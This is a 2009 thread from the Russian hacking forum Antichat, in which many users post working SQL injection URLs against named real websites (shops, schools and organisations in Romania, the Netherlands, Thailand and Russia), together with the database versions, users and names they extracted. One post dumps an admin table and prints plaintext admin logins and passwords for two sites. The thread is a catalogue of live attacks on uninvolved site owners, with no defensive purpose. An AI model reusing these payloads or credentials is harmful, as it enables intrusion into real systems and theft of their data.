ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8071  
Старый 01.03.2009, 03:18
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

http://media-empire.net/spam/e-Spam.php?intSpamID=-251+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6,7,8,9,10,11,12--

ewok_2_w@209.68.2.53
5.0.67-log
ewok_bloods
 
Ответить с цитированием

  #8072  
Старый 01.03.2009, 03:22
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://snm.nnov.ru
PR: 4
Тиц: 30
Версия: 4.0.25
База данных: snmsila
Юзверь: snmsila@localhost
Код:
http://www.snm.nnov.ru/?doc=4&id=12&nid=-1%20union%20select%201,2,3,4,5--
 
Ответить с цитированием

Магаз футболок
  #8073  
Старый 01.03.2009, 03:53
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию Магаз футболок

Код:
http://topmayka.com/index.php?action=looktshirt&id=-229%20union%20select%201,version(),3,4,5,6,7,8,9,10%20from%20users%20--
version::4.1.22-log
 
Ответить с цитированием

  #8074  
Старый 01.03.2009, 09:46
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.edilgroup.ro/punct-presa-detaliu.php?id=-9+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13




Database Version: 5.0.32-Debian_7etch6
Database name: edilgroup
User name: edilgroup@localhost
 
Ответить с цитированием

  #8075  
Старый 01.03.2009, 10:38
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.kos-check.com PR=3
Код:
http://www.kos-check.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(version(),user(),database()),3,4,5--
kosmma_admin@localhost
4.1.22-standard-log
kosmma_cms


www.dsm.edu.uy PR=5
Код:
http://www.dsm.edu.uy/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,1,user(),3, version(),5,6,7,8,9,10,11--

5.0.51a-community
dsmedu_admin@localhost

Последний раз редактировалось jokester; 01.03.2009 в 11:22.. Причина: Объединяем посты
 
Ответить с цитированием

  #8076  
Старый 01.03.2009, 11:26
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.kop.ru pr-3 Тиц - 400
PHP код:
http://www.kop.ru/?go=issues&issue=-79+union+select+1,2,3,4,concat_ws(0x3A,@@version,user()),6,7+--+ 
@@version: 5.0.45
user(): truster@garant-sk-97.ip.PeterStar.net
 
Ответить с цитированием

  #8077  
Старый 01.03.2009, 11:32
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

artpace.org - PR5 тИЦ - 10
Код:
http://www.artpace.org/aboutTheExhibition.php?axid=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8/*
Есть еще табла sec_user, но там ничего интерестного...
Код:
http://www.artpace.org/aboutTheExhibition.php?axid=-99999+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit+38,1/*
 
Ответить с цитированием

  #8078  
Старый 01.03.2009, 11:35
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.tiglastal.ro/produse.php?cat=3&scat=-23+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7



Database Version: 4.1.22-standard
Database name: tiglas_tiglas
User name: tiglas_tiglas@localhost



http://www.favisan.ro/catalog.php?detalii=-171+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8


Database Version: 4.1.22-standard
Database name: favisan_favisan
User name: favisan@localhost

Последний раз редактировалось Gorev; 01.03.2009 в 11:44..
 
Ответить с цитированием

  #8079  
Старый 01.03.2009, 12:35
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Интернет магазин

saktalingchan.com PR=5


Database saktalin_shop
Таблицы:
Код:
CJ_UsersOnline
true_admin  
true_boardans 
true_boardque 
true_boardworld 
true_config  
true_confirm  
true_content 
true_contentcat 
true_contentsub 
true_gallery  
true_gallerycat  
true_help 
true_help2  
true_items  
true_links  
true_product 
true_productcategory 
true_productcategorysub 
true_proname 
true_sale 
true_ticket

Код:
http://www.saktalingchan.com/product.php?catid=1&catsubid=3&id=171+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3,id,user,pass ),10,11,12,13,14,15,16,17,18,19,20+from+true_admin--
С выводом пароля че-то втыкал долго не думал что pass

2 админа
login:saktalingchan pass:8687222
login:trueamulet pass:jwebmaster



Админку не нашел правда я её и не особо искал




grandlite.co.th


Database grandlit_db
Table:
Код:
grandliteadmin 
prdadep  
prdbcat 
prdcprd

Сайт ваще весь дырявый как друшлак

Код:
http://www.grandlite.co.th/onproduct.php?id=277+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin+limit+1,1--

Код:
http://www.grandlite.co.th/product.php?depid=9+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin--
Админку не нашёл и тут. Все что удалось узнать это pass=password а логин скоре всего admin.

Последний раз редактировалось S0ulVortex; 01.03.2009 в 12:55..
 
Ответить с цитированием

  #8080  
Старый 01.03.2009, 15:05
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

АП, вот вам мой севодняшний сбор уязвимостей! Пройдемся по nl.
Код:
http://www.nanoshield.nl/productinfo.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8--
версия/юзер/бд:
Код:
faq@blade22.geenpunt.nl5.0.32-Debian_7etch8faq
------------------------------------------------------------------
Код:
http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3--
версия/юзер/бд:
Код:
educos@www03.ip2.net5.0.51educos
------------------------------------------------------------------

Код:
http://www.jansiebelink.nl/detail.php?id=-1+union+all+select+concat_ws(version(),user(),database())--
версия/юзер/бд:

Код:
haas@10.171.105.65.0.32-Debian_7etch8-logjan
----------------------------------------------------------------
Код:
http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:

Код:
5053nvha@10.0.1.615.0.51a-3ubuntu5.15053nvha
-----------------------------------------------------------------

Код:
http://www.art-innovation.nl/event.php?id=-1+union+all+select+concat_ws(version(),user(),database()),1--
версия/юзер/бд:

Код:
artinnovat_main@localhost4.0.23-standard-logartinnovat_main
------------------------------------------------------------------

Код:
http://www.tamaynut.nl/newsdetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10,11--
версия/юзер/бд:

Код:
tamayn32_tamaynu@localhost4.1.22-standardtamayn32_tamaynut
----------------------------------------------------------------

Код:
http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7--
версия/юзер/бд:

Код:
trovet_user@localhost5.0.27trovet_data
---------------------------------------------------------------

Код:
http://www.26000gezichten.nl/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
версия/юзер/бд:

Код:
26000gezichten@localhost4.0.24_Debian-10sarge2-log26000gezichten
--------------------------------------------------------------

Код:
http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2--
версия/юзер/бд:

Код:
zeelandwon_joom@localhost5.0.51a-community-logzeelandwon_joom
---------------------------------------------------------------

Код:
http://www.opdesloep.nl/pages.php?id=-1+union+all+select+0,1,2,convert(concat_ws(version(),user(),database())+using+latin1),4,5--
версия/юзер/бд:

Код:
sitesuntrack@localhost4.1.12-standard-logsuntrack
----------------------------------------------------------------------
The End!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ